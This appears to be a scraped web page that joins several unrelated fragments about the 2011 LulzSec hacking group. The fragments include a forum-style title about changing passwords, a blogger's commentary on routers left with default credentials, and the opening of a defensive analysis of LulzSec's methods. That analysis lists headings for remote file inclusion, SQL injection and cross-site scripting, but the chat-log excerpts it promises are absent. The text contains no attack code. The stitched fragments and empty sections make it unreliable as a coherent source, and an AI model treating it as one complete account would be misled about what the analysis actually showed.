Should I Change My Password? What to do regarding lulzsec dox : modnews. Take a bow everybody, the security industry really failed this time. I haven’t said anything about Lulzsec publicly yet and I don’t really have a good reason for the lack of comment. I have been watching their activities with great amusement. On Saturday I saw they released a large list of routers IP addresses and the username and passwords. The passwords looked like they were set to default values. This actually made me laugh out loud and I had two thoughts. First and foremost how was this allowed to happen if you are doing regular security checks?
The second thought is who will take the blame for this from the offending company? First off I've heard a lot of people say that Lulzsec did security a favor by really showing the need for security. Putting your security in the hands of tools will fail you every time. A tool is a device that helps you accomplish a goal not a magic device that will accomplish the goal by itself. How did all those routers go with easy to guess user names and passwords and nobody in the company noticed? Analyzing the Lulzsec Attacks. We analyzed the chat logs from Lulzsec that were provided in the Guardian.
Specifically, we tried to analyze the technical approach used to bring down websites and steal data. Hopefully, our analysis can give security teams and even nontechies insights into how Lulzsec carried out their attacks and more importantly, help tune defenses. (We'd also recommend looking Byron's blog for some other lessons.) Lulzsec was a team of hackers focused on breaking applications and databases. There were no virus or malware experts. Even their approach to distributed denial of service (DDoS) attacks relied on weaknesses in applications. We hope this episode helps bring attention to the fact that the center of gravity has shifted from firewalls and anti-virus to applications and databases.
Here's a breakdown of the major technical tools used to hack sites worldwide: Tool #1: Remote File Include The relevant snippet from the chat log (emphasis ours): Tool #2: SQL Injection Tool #3: Cross Site Scripting.